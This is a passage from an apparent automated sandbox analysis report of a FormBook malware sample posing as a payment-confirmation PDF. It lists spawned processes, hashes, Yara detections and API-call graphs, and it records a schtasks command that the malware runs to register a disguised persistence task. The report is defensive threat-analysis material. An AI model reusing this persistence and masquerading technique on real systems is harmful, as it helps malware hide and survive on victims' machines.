                                                                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000A.00000002.1653324065.00000000012E0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000A.00000002.1655068800.00000000018D0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                      Reputation:high
                                                                      Has exited:true

                                                                      Target ID:11
                                                                      Start time:02:54:23
                                                                      Start date:27/11/2024
                                                                      Path:C:\Users\user\AppData\Roaming\cQwRvD.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:C:\Users\user\AppData\Roaming\cQwRvD.exe
                                                                      Imagebase:0xeb0000
                                                                      File size:861'704 bytes
                                                                      MD5 hash:DBB00CEAC5C3C668BDBB0C91DF825BE7
                                                                      Has elevated privileges:false
                                                                      Has administrator privileges:false
                                                                      Programmed in:C, C++ or other language
                                                                      Antivirus matches:
                                                                      • Detection: 100%, Joe Sandbox ML
                                                                      • Detection: 34%, ReversingLabs
                                                                      Reputation:low
                                                                      Has exited:true

                                                                      Target ID:12
                                                                      Start time:02:54:23
                                                                      Start date:27/11/2024
                                                                      Path:C:\Windows\System32\wbem\WmiPrvSE.exe
                                                                      Wow64 process (32bit):false
                                                                      Commandline:C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                                                                      Imagebase:0x7ff7fb730000
                                                                      File size:496'640 bytes
                                                                      MD5 hash:60FF40CFD7FB8FE41EE4FE9AE5FE1C51
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:false
                                                                      Programmed in:C, C++ or other language
                                                                      Reputation:high
                                                                      Has exited:false

                                                                      Target ID:14
                                                                      Start time:04:39:30
                                                                      Start date:27/11/2024
                                                                      Path:C:\Windows\SysWOW64\schtasks.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\cQwRvD" /XML "C:\Users\user\AppData\Local\Temp\tmp9BD5.tmp"
                                                                      Imagebase:0xb50000
                                                                      File size:187'904 bytes
                                                                      MD5 hash:48C2FE20575769DE916F48EF0676A965
                                                                      Has elevated privileges:false
                                                                      Has administrator privileges:false
                                                                      Programmed in:C, C++ or other language
                                                                      Reputation:high
                                                                      Has exited:true

                                                                      Target ID:15
                                                                      Start time:04:39:30
                                                                      Start date:27/11/2024
                                                                      Path:C:\Windows\System32\conhost.exe
                                                                      Wow64 process (32bit):false
                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                      Imagebase:0x7ff75da10000
                                                                      File size:862'208 bytes
                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                      Has elevated privileges:false
                                                                      Has administrator privileges:false
                                                                      Programmed in:C, C++ or other language
                                                                      Reputation:high
                                                                      Has exited:true

                                                                      Target ID:16
                                                                      Start time:04:39:30
                                                                      Start date:27/11/2024
                                                                      Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                      Wow64 process (32bit):false
                                                                      Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
                                                                      Imagebase:0x1e0000
                                                                      File size:45'984 bytes
                                                                      MD5 hash:9D352BC46709F0CB5EC974633A0C3C94
                                                                      Has elevated privileges:false
                                                                      Has administrator privileges:false
                                                                      Programmed in:C, C++ or other language
                                                                      Has exited:true

                                                                      Target ID:17
                                                                      Start time:04:39:30
                                                                      Start date:27/11/2024
                                                                      Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
                                                                      Imagebase:0x6a0000
                                                                      File size:45'984 bytes
                                                                      MD5 hash:9D352BC46709F0CB5EC974633A0C3C94
                                                                      Has elevated privileges:false
                                                                      Has administrator privileges:false
                                                                      Programmed in:C, C++ or other language
                                                                      Has exited:true

                                                                      Target ID:18
                                                                      Start time:04:39:36
                                                                      Start date:27/11/2024
                                                                      Path:C:\Program Files (x86)\JZZsGcsPsARSuUgODzETesZnARHvsqZSeMlpDbYoFZlqmwGaICbIOTkQtohiFAmdzWuOucBPlSG\mYtMtAAMpAtCOL.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:"C:\Program Files (x86)\JZZsGcsPsARSuUgODzETesZnARHvsqZSeMlpDbYoFZlqmwGaICbIOTkQtohiFAmdzWuOucBPlSG\mYtMtAAMpAtCOL.exe"
                                                                      Imagebase:0xff0000
                                                                      File size:140'800 bytes
                                                                      MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                      Has elevated privileges:false
                                                                      Has administrator privileges:false
                                                                      Programmed in:C, C++ or other language
                                                                      Yara matches:
                                                                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000012.00000002.2564166926.00000000027C0000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                                                      Has exited:false

                                                                      Target ID:19
                                                                      Start time:04:39:38
                                                                      Start date:27/11/2024
                                                                      Path:C:\Windows\SysWOW64\sdiagnhost.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:"C:\Windows\SysWOW64\sdiagnhost.exe"
                                                                      Imagebase:0xc70000
                                                                      File size:31'744 bytes
                                                                      MD5 hash:76676F0A21E6AF109845151B3CEFE211
                                                                      Has elevated privileges:false
                                                                      Has administrator privileges:false
                                                                      Programmed in:C, C++ or other language
                                                                      Yara matches:
                                                                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000013.00000002.2548468685.0000000000840000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000013.00000002.2562055554.0000000000C00000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000013.00000002.2562947520.0000000004520000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                      Has exited:false

                                                                      Target ID:20
                                                                      Start time:04:39:52
                                                                      Start date:27/11/2024
                                                                      Path:C:\Program Files (x86)\JZZsGcsPsARSuUgODzETesZnARHvsqZSeMlpDbYoFZlqmwGaICbIOTkQtohiFAmdzWuOucBPlSG\mYtMtAAMpAtCOL.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:"C:\Program Files (x86)\JZZsGcsPsARSuUgODzETesZnARHvsqZSeMlpDbYoFZlqmwGaICbIOTkQtohiFAmdzWuOucBPlSG\mYtMtAAMpAtCOL.exe"
                                                                      Imagebase:0xff0000
                                                                      File size:140'800 bytes
                                                                      MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                      Has elevated privileges:false
                                                                      Has administrator privileges:false
                                                                      Programmed in:C, C++ or other language
                                                                      Yara matches:
                                                                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000014.00000002.2567539017.00000000058F0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                      Has exited:false

                                                                      Target ID:22
                                                                      Start time:04:40:05
                                                                      Start date:27/11/2024
                                                                      Path:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                      Wow64 process (32bit):false
                                                                      Commandline:"C:\Program Files\Mozilla Firefox\Firefox.exe"
                                                                      Imagebase:0x7ff722870000
                                                                      File size:676'768 bytes
                                                                      MD5 hash:C86B1BE9ED6496FE0E0CBE73F81D8045
                                                                      Has elevated privileges:false
                                                                      Has administrator privileges:false
                                                                      Programmed in:C, C++ or other language
                                                                      Has exited:true

                                                                      Reset < >

                                                                        Execution Graph

                                                                        Execution Coverage:7.2%
                                                                        Dynamic/Decrypted Code Coverage:100%
                                                                        Signature Coverage:0%
                                                                        Total number of Nodes:79
                                                                        Total number of Limit Nodes:8
                                                                        execution_graph 15545 13b4668 15546 13b467a 15545->15546 15547 13b4686 15546->15547 15551 13b4779 15546->15551 15556 13b3e28 15547->15556 15549 13b46a5 15552 13b479d 15551->15552 15560 13b4878 15552->15560 15564 13b4888 15552->15564 15557 13b3e33 15556->15557 15572 13b5c44 15557->15572 15559 13b6ff6 15559->15549 15561 13b4888 15560->15561 15563 13b498c 15561->15563 15568 13b44b0 15561->15568 15566 13b48af 15564->15566 15565 13b498c 15566->15565 15567 13b44b0 CreateActCtxA 15566->15567 15567->15565 15569 13b5918 CreateActCtxA 15568->15569 15571 13b59db 15569->15571 15573 13b5c4f 15572->15573 15576 13b5c64 15573->15576 15575 13b7165 15575->15559 15577 13b5c6f 15576->15577 15580 13b5c94 15577->15580 15579 13b7242 15579->15575 15581 13b5c9f 15580->15581 15584 13b5cc4 15581->15584 15583 13b7345 15583->15579 15586 13b5ccf 15584->15586 15585 13b8689 15585->15583 15587 13b864b 15586->15587 15590 13bacf8 15586->15590 15587->15585 15594 13bcdf7 15587->15594 15599 13bad1f 15590->15599 15604 13bad30 15590->15604 15591 13bad0e 15591->15587 15595 13bce19 15594->15595 15596 13bce3d 15595->15596 15618 13bcfa8 15595->15618 15622 13bcfa7 15595->15622 15596->15585 15600 13bad30 15599->15600 15608 13bae28 15600->15608 15613 13bae18 15600->15613 15601 13bad3f 15601->15591 15606 13bae28 GetModuleHandleW 15604->15606 15607 13bae18 GetModuleHandleW 15604->15607 15605 13bad3f 15605->15591 15606->15605 15607->15605 15609 13bae39 15608->15609 15610 13bae5c 15608->15610 15609->15610 15611 13bb060 GetModuleHandleW 15609->15611 15610->15601 15612 13bb08d 15611->15612 15612->15601 15614 13bae5c 15613->15614 15615 13bae39 15613->15615 15614->15601 15615->15614 15616 13bb060 GetModuleHandleW 15615->15616 15617 13bb08d 15616->15617 15617->15601 15619 13bcfb5 15618->15619 15620 13bcfef 15619->15620 15626 13bbb60 15619->15626 15620->15596 15623 13bcfb5 15622->15623 15624 13bcfef 15623->15624 15625 13bbb60 2 API calls 15623->15625 15624->15596 15625->15624 15627 13bbb6b 15626->15627 15629 13bdd08 15627->15629 15630 13bd35c 15627->15630 15629->15629 15631 13bd367 15630->15631 15632 13b5cc4 2 API calls 15631->15632 15633 13bdd77 15632->15633 15633->15629 15634 13bd710 DuplicateHandle 15635 13bd7a6 15634->15635 15636 13bd0c0 15637 13bd106 GetCurrentProcess 15636->15637 15639 13bd158 GetCurrentThread 15637->15639 15640 13bd151 15637->15640 15641 13bd18e 15639->15641 15642 13bd195 GetCurrentProcess 15639->15642 15640->15639 15641->15642 15645 13bd1cb 15642->15645 15643 13bd1f3 GetCurrentThreadId 15644 13bd224 15643->15644 15645->15643

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 294 13bd0b1-13bd14f GetCurrentProcess 298 13bd158-13bd18c GetCurrentThread 294->298 299 13bd151-13bd157 294->299 300 13bd18e-13bd194 298->300 301 13bd195-13bd1c9 GetCurrentProcess 298->301 299->298 300->301 303 13bd1cb-13bd1d1 301->303 304 13bd1d2-13bd1ed call 13bd699 301->304 303->304 306 13bd1f3-13bd222 GetCurrentThreadId 304->306 308 13bd22b-13bd28d 306->308 309 13bd224-13bd22a 306->309 309->308
                                                                        APIs
                                                                        • GetCurrentProcess.KERNEL32 ref: 013BD13E
                                                                        • GetCurrentThread.KERNEL32 ref: 013BD17B
                                                                        • GetCurrentProcess.KERNEL32 ref: 013BD1B8
                                                                        • GetCurrentThreadId.KERNEL32 ref: 013BD211
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1420717251.00000000013B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013B0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_13b0000_Payment_Confirmation_pdf.jbxd
                                                                        Similarity
                                                                        • API ID: Current$ProcessThread
                                                                        • String ID:
                                                                        • API String ID: 2063062207-0
                                                                        • Opcode ID: 352f4f5f9ddfd668d26d5d9c8935c95319fe78c4b0e35184e1494a8d8f1e8dd0
                                                                        • Instruction ID: 29ffd9ac12ed52b72e67b18aa712062a7a2d700e71eb48e94352319ef7e8eaee
                                                                        • Opcode Fuzzy Hash: 352f4f5f9ddfd668d26d5d9c8935c95319fe78c4b0e35184e1494a8d8f1e8dd0
                                                                        • Instruction Fuzzy Hash: 5A5165B0D003098FDB14DFA9D588BEEBBF1EF48318F208459E519AB3A0D7349845CB65

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 316 13bd0c0-13bd14f GetCurrentProcess 320 13bd158-13bd18c GetCurrentThread 316->320 321 13bd151-13bd157 316->321 322 13bd18e-13bd194 320->322 323 13bd195-13bd1c9 GetCurrentProcess 320->323 321->320 322->323 325 13bd1cb-13bd1d1 323->325 326 13bd1d2-13bd1ed call 13bd699 323->326 325->326 328 13bd1f3-13bd222 GetCurrentThreadId 326->328 330 13bd22b-13bd28d 328->330 331 13bd224-13bd22a 328->331 331->330
                                                                        APIs
                                                                        • GetCurrentProcess.KERNEL32 ref: 013BD13E
                                                                        • GetCurrentThread.KERNEL32 ref: 013BD17B
                                                                        • GetCurrentProcess.KERNEL32 ref: 013BD1B8
                                                                        • GetCurrentThreadId.KERNEL32 ref: 013BD211
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1420717251.00000000013B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013B0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_13b0000_Payment_Confirmation_pdf.jbxd
                                                                        Similarity
                                                                        • API ID: Current$ProcessThread
                                                                        • String ID:
                                                                        • API String ID: 2063062207-0
                                                                        • Opcode ID: 204b3b8305a66625e9867d8fda5006eda3d4f56087cb13f14f4bdbccd9b75105
                                                                        • Instruction ID: ecaaaea524ece4329bc8ebe31b664d003daed2f59ba99843641b1801f8b7f60f
                                                                        • Opcode Fuzzy Hash: 204b3b8305a66625e9867d8fda5006eda3d4f56087cb13f14f4bdbccd9b75105
                                                                        • Instruction Fuzzy Hash: 425144B0D003498FDB14DFAAD588BEEBBF1EB88318F208459E519AB360D7749844CF65

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 360 13bae28-13bae37 361 13bae39-13bae46 call 13ba14c 360->361 362 13bae63-13bae67 360->362 369 13bae48 361->369 370 13bae5c 361->370 363 13bae7b-13baebc 362->363 364 13bae69-13bae73 362->364 371 13baec9-13baed7 363->371 372 13baebe-13baec6 363->372 364->363 417 13bae4e call 13bb0b0 369->417 418 13bae4e call 13bb0c0 369->418 370->362 373 13baefb-13baefd 371->373 374 13baed9-13baede 371->374 372->371 376 13baf00-13baf07 373->376 377 13baee9 374->377 378 13baee0-13baee7 call 13ba158 374->378 375 13bae54-13bae56 375->370 379 13baf98-13bafaf 375->379 380 13baf09-13baf11 376->380 381 13baf14-13baf1b 376->381 383 13baeeb-13baef9 377->383 378->383 393 13bafb1-13bb010 379->393 380->381 384 13baf28-13baf31 call 13ba168 381->384 385 13baf1d-13baf25 381->385 383->376 391 13baf3e-13baf43 384->391 392 13baf33-13baf3b 384->392 385->384 394 13baf61-13baf6e 391->394 395 13baf45-13baf4c 391->395 392->391 411 13bb012-13bb058 393->411 400 13baf91-13baf97 394->400 401 13baf70-13baf8e 394->401 395->394 396 13baf4e-13baf5e call 13ba178 call 13ba188 395->396 396->394 401->400 412 13bb05a-13bb05d 411->412 413 13bb060-13bb08b GetModuleHandleW 411->413 412->413 414 13bb08d-13bb093 413->414 415 13bb094-13bb0a8 413->415 414->415 417->375 418->375
                                                                        APIs
                                                                        • GetModuleHandleW.KERNEL32(00000000), ref: 013BB07E
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1420717251.00000000013B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013B0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_13b0000_Payment_Confirmation_pdf.jbxd
                                                                        Similarity
                                                                        • API ID: HandleModule
                                                                        • String ID:
                                                                        • API String ID: 4139908857-0
                                                                        • Opcode ID: 153600fb44e139940db82fe68e3c0abbcc883036267465ce21f5f6589ba47c85
                                                                        • Instruction ID: b660193fb1f2936799ab4413269d629f4e762455384fe126020c13f40d7fc59c
                                                                        • Opcode Fuzzy Hash: 153600fb44e139940db82fe68e3c0abbcc883036267465ce21f5f6589ba47c85
                                                                        • Instruction Fuzzy Hash: 237148B0A00B058FD725DF29D49479ABBF1FF88304F00892DD69AD7A50E775E849CB90

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 419 13b590c-13b5916 420 13b5918-13b59d9 CreateActCtxA 419->420 422 13b59db-13b59e1 420->422 423 13b59e2-13b5a3c 420->423 422->423 430 13b5a4b-13b5a4f 423->430 431 13b5a3e-13b5a41 423->431 432 13b5a51-13b5a5d 430->432 433 13b5a60 430->433 431->430 432->433 435 13b5a61 433->435 435->435
                                                                        APIs
                                                                        • CreateActCtxA.KERNEL32(?), ref: 013B59C9
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1420717251.00000000013B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013B0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_13b0000_Payment_Confirmation_pdf.jbxd
                                                                        Similarity
                                                                        • API ID: Create
                                                                        • String ID:
                                                                        • API String ID: 2289755597-0
                                                                        • Opcode ID: 58eaf7a920e877ed6f430f323edc9c9efe520185fb27012f7471188d89bf810b
                                                                        • Instruction ID: 97d4f2504d2c4bdca929c36837a9c1b3c7ff6171916255d3be8aff7c4fe47859
                                                                        • Opcode Fuzzy Hash: 58eaf7a920e877ed6f430f323edc9c9efe520185fb27012f7471188d89bf810b
                                                                        • Instruction Fuzzy Hash: 3441F1B0C0171DCBEB25DFA9C884BCDBBB6BF49304F20806AD509AB251DB75694ACF50

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 436 13b44b0-13b59d9 CreateActCtxA 439 13b59db-13b59e1 436->439 440 13b59e2-13b5a3c 436->440 439->440 447 13b5a4b-13b5a4f 440->447 448 13b5a3e-13b5a41 440->448 449 13b5a51-13b5a5d 447->449 450 13b5a60 447->450 448->447 449->450 452 13b5a61 450->452 452->452
                                                                        APIs
                                                                        • CreateActCtxA.KERNEL32(?), ref: 013B59C9
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1420717251.00000000013B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013B0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_13b0000_Payment_Confirmation_pdf.jbxd
                                                                        Similarity
                                                                        • API ID: Create
                                                                        • String ID:
                                                                        • API String ID: 2289755597-0
                                                                        • Opcode ID: 757a47235880c56efcd63b9d80f24cd6c16e65162bfa2eb33468542f17afc861
                                                                        • Instruction ID: da1bc00c619351d6a8c18a1937b2f575b011ac1a54d0e3fe0e26c7d333bc5fc1
                                                                        • Opcode Fuzzy Hash: 757a47235880c56efcd63b9d80f24cd6c16e65162bfa2eb33468542f17afc861
                                                                        • Instruction Fuzzy Hash: 8C41F270C0071DCBEB25DFA9C884BCEBBB6BF49304F20806AD509AB251DB756946CF90

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 458 13bd710-13bd7a4 DuplicateHandle 459 13bd7ad-13bd7ca 458->459 460 13bd7a6-13bd7ac 458->460 460->459
                                                                        APIs
                                                                        • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 013BD797
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1420717251.00000000013B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013B0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_13b0000_Payment_Confirmation_pdf.jbxd
                                                                        Similarity
                                                                        • API ID: DuplicateHandle
                                                                        • String ID:
                                                                        • API String ID: 3793708945-0
                                                                        • Opcode ID: 9af120ffad970202c26f3fd63ba28dc8e1a2cf7c5e49c768dbad71eec2228ea5
                                                                        • Instruction ID: 37ef8c319f7105c744d7c8b8edab452b70b86cfe4f531286ba925a2966621d74
                                                                        • Opcode Fuzzy Hash: 9af120ffad970202c26f3fd63ba28dc8e1a2cf7c5e49c768dbad71eec2228ea5
                                                                        • Instruction Fuzzy Hash: 5621E4B5D002489FDB10CF9AD885ADEBFF5EB48324F14841AE918A3350D379A944CF61

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 453 13bd709-13bd7a4 DuplicateHandle 454 13bd7ad-13bd7ca 453->454 455 13bd7a6-13bd7ac 453->455 455->454
                                                                        APIs
                                                                        • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 013BD797
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1420717251.00000000013B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013B0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_13b0000_Payment_Confirmation_pdf.jbxd
                                                                        Similarity
                                                                        • API ID: DuplicateHandle
                                                                        • String ID:
                                                                        • API String ID: 3793708945-0
                                                                        • Opcode ID: 9a323584091aad974ad8f4416edb82d14a7de9d223ea7b628c2fd3d6272fbea7
                                                                        • Instruction ID: 22ed6b8b609a6382bbddf7b36b51fadf7b0f1e9f68e458419046bdf62a90c32e
                                                                        • Opcode Fuzzy Hash: 9a323584091aad974ad8f4416edb82d14a7de9d223ea7b628c2fd3d6272fbea7
                                                                        • Instruction Fuzzy Hash: 1621E4B5D002499FDB10CF99D985AEEBBF5EB08314F14842AE918B3350D378A944CF60

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 463 13bb018-13bb058 464 13bb05a-13bb05d 463->464 465 13bb060-13bb08b GetModuleHandleW 463->465 464->465 466 13bb08d-13bb093 465->466 467 13bb094-13bb0a8 465->467 466->467
                                                                        APIs
                                                                        • GetModuleHandleW.KERNEL32(00000000), ref: 013BB07E
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1420717251.00000000013B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013B0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_13b0000_Payment_Confirmation_pdf.jbxd
                                                                        Similarity
                                                                        • API ID: HandleModule
                                                                        • String ID:
                                                                        • API String ID: 4139908857-0
                                                                        • Opcode ID: 4c34255b8de086d0ce82bacc84dfe0a41999b7494137bd5248ecafe398dafd89
                                                                        • Instruction ID: f975d58b718cd9d847b230c7a9a0f9b47aa40a052f86d6571a97c7a5aa2c591d
                                                                        • Opcode Fuzzy Hash: 4c34255b8de086d0ce82bacc84dfe0a41999b7494137bd5248ecafe398dafd89
                                                                        • Instruction Fuzzy Hash: 9811DFB5C003498FDB20DF9AC884BDEFBF5EB88224F10842AD569A7610D779A545CFA1
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1416521999.00000000012ED000.00000040.00000800.00020000.00000000.sdmp, Offset: 012ED000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_12ed000_Payment_Confirmation_pdf.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 019439d29e128c686ead67e1d753bae51612f7d06cd4353771bce8705f5c04c5
                                                                        • Instruction ID: 8475716bfa12df8d78bdd006605841c75623a0d4c7f5c708d0367b88b7b6caa8
                                                                        • Opcode Fuzzy Hash: 019439d29e128c686ead67e1d753bae51612f7d06cd4353771bce8705f5c04c5
                                                                        • Instruction Fuzzy Hash: 0F210372514208DFDF05DF94D9C8B26BBA5FB88320F60C5A9E9090B247C376D416CBA2
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1417009062.00000000012FD000.00000040.00000800.00020000.00000000.sdmp, Offset: 012FD000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_12fd000_Payment_Confirmation_pdf.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 1b87e1856a15649a849a691424dc0548ec06a619a20deb78326ef9963ba4182c
                                                                        • Instruction ID: 452eab0d902135cf2dcb33735161146f395606fe73138480dc0de63edec2deb5
                                                                        • Opcode Fuzzy Hash: 1b87e1856a15649a849a691424dc0548ec06a619a20deb78326ef9963ba4182c
                                                                        • Instruction Fuzzy Hash: 9D2100B56142089FDB05DF54D9C4B16FBA5EB84314F20C57DDA094B282C376E846CB62
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1417009062.00000000012FD000.00000040.00000800.00020000.00000000.sdmp, Offset: 012FD000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_12fd000_Payment_Confirmation_pdf.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: f58cc280c84a9ba1afa5f121237c199614a03467060fe7c1791c9f9612359a94
                                                                        • Instruction ID: 44d12ba2a3fbc4493e57321e2f1bba6e15a5bebdfaa0e7b700c54052ef39a056
                                                                        • Opcode Fuzzy Hash: f58cc280c84a9ba1afa5f121237c199614a03467060fe7c1791c9f9612359a94
                                                                        • Instruction Fuzzy Hash: 5D210075614208DFDB15DF64D984B16FB61EB84314F20C57DEA0A4B286C376D807CA62
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1417009062.00000000012FD000.00000040.00000800.00020000.00000000.sdmp, Offset: 012FD000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_12fd000_Payment_Confirmation_pdf.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 4c49df9a2c9f68802ec300c9bd85ef5305acdabaf37321772eea737281dc933e
                                                                        • Instruction ID: 6746a9a547f5c25a1f0657832e69af0890e859e7a8d340ab449281d8b28a1d44
                                                                        • Opcode Fuzzy Hash: 4c49df9a2c9f68802ec300c9bd85ef5305acdabaf37321772eea737281dc933e
                                                                        • Instruction Fuzzy Hash: B72179755093848FCB06CF24D990B15BF71EB46314F28C5EED9498B2A7C33A980ACB62
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1416521999.00000000012ED000.00000040.00000800.00020000.00000000.sdmp, Offset: 012ED000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_12ed000_Payment_Confirmation_pdf.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 6fa0a9b6888ab601070468a7c49be392b44274aed9e91ce62da6c30ec0883e0c
                                                                        • Instruction ID: ea144ea67fa752d0d488d44e93d4bb9f4b7df8f1e385eb979b29980c1c94cab3
                                                                        • Opcode Fuzzy Hash: 6fa0a9b6888ab601070468a7c49be392b44274aed9e91ce62da6c30ec0883e0c
                                                                        • Instruction Fuzzy Hash: 5821CD76504244CFDB06CF54D9C4B16BFA2FB84320F24C1AADD080A257C33AD426CBA1
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1417009062.00000000012FD000.00000040.00000800.00020000.00000000.sdmp, Offset: 012FD000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_12fd000_Payment_Confirmation_pdf.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 4ccb17c466d2e34b86bde66ac975e9cbefd8e24c09005379d072ef0b40a0d1c0
                                                                        • Instruction ID: f130409be4c11694321c336667afcab914e61c1e281aa56fd5d951ba6bc23814
                                                                        • Opcode Fuzzy Hash: 4ccb17c466d2e34b86bde66ac975e9cbefd8e24c09005379d072ef0b40a0d1c0
                                                                        • Instruction Fuzzy Hash: AD11BE75504244DFCB06CF54D5C4B55FB61FB84314F24C6ADDA494B256C33AE44ACB61
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1420717251.00000000013B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013B0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_13b0000_Payment_Confirmation_pdf.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: ba645316b1ba38320b12e21c46ce69e127b27577e2fdbeb590f63371b8fb5b99
                                                                        • Instruction ID: d4161569ce04aa692624dc46cfdd85d77afda52d974a34264c86be4ca4b5dc39
                                                                        • Opcode Fuzzy Hash: ba645316b1ba38320b12e21c46ce69e127b27577e2fdbeb590f63371b8fb5b99
                                                                        • Instruction Fuzzy Hash: F3A18136E002198FCF15DFB8C8805DEBBB6FF84304B15956AEA05AF665EB31E905CB40

                                                                        Execution Graph

                                                                        Execution Coverage:1.4%
                                                                        Dynamic/Decrypted Code Coverage:4.7%
                                                                        Signature Coverage:8.8%
                                                                        Total number of Nodes:148
                                                                        Total number of Limit Nodes:11
